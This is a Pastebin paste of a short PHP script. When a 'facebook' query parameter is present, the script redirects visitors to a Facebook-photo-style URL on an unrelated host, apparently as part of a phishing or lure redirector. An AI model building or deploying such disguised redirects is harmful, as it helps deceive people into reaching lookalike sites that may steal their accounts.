Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- include('index.dat');
- $y = substr(uniqid('', true), -15);
- if(isset($_GET['facebook']) == true) {
- sleep(2);
- $x= 'http://www.rebooter.url.ph/photo.php?fbid='. $y .'&type=1&theater';
- echo '<META http-equiv="refresh" content="1;URL='. $x .'">
- ';
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment